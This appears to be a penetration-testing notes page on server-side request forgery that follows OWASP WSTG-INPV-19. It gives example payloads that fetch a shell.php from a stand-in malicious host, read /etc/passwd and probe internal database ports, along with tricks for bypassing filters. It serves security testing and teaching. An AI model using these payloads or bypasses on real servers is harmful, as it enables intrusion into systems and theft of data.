Skip to content

SSRF attack - Server Side Request Forgery

OWASP

OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery

ID Link to Hackinglife Link to OWASP Description
7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location. The attacker could create a request to internet or to the intranet, which can be used to port scan or probe a remote machine. Basically, it could allow an atacker to:

  • Take control of a remote machine.
  • Read or update data.
  • Read the server configuration.
  • Connect to internal services...

With:

http://
file:///
dict://

Exploitation

Load the Contents of a File

GET https://example.com/page?page=https://malicioussite.com/shell.php

See Burpsuite Labs

Read files from restricted resources

GET https://example.com/page?page=https://localhost:8080/admin
GET https://example.com/page?page=https://127.0.0.1:8080/admin
GET https://example.com/page?page=file:///etc/passwd

Read files from other backend systems

In some cases, the application server is able to interact with back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses.

GET https://example.com/page?page=https://localhost:3306/
GET https://example.com/page?page=https://localhost:6379/
GET https://example.com/page?page=https://localhost:8080/

Gopherus sends non authenticated requests to other services and it succedde

Techniques

Bypass blacklist-based input filters

Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using the following techniques:

  • Use an alternative IP representation of 127.0.0.1, such as 2130706433017700000001, or 127.1.
  • Register your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose.
  • Obfuscate blocked strings using URL encoding or case variation.
  • Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an http: to https: URL during the redirect has been shown to bypass some anti-SSRF filters.

Bypass whitelist-based input filters

Some applications only allow inputs that match, a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within in it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing.

  • Using the @ character to separate between the userinfo and the host: `https://expected-host:fakepassword@evil-host
  • URL fragmentation with the # character: https://attacker-domain#expected-domain
  • You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: - https://expected-host.evil-host
  • URL encoding. Double URL-encode characters to confuse the URL-parsing code.
  • Fuzzing
  • Combinations of all of the above

Exploiting redirection vulnerabilities

It is sometimes possible to bypass filter-based defenses by exploiting an open redirection vulnerability.

Resources

Tools and payloads

Last update: 2024-05-01
Created: January 18, 2023 20:02:39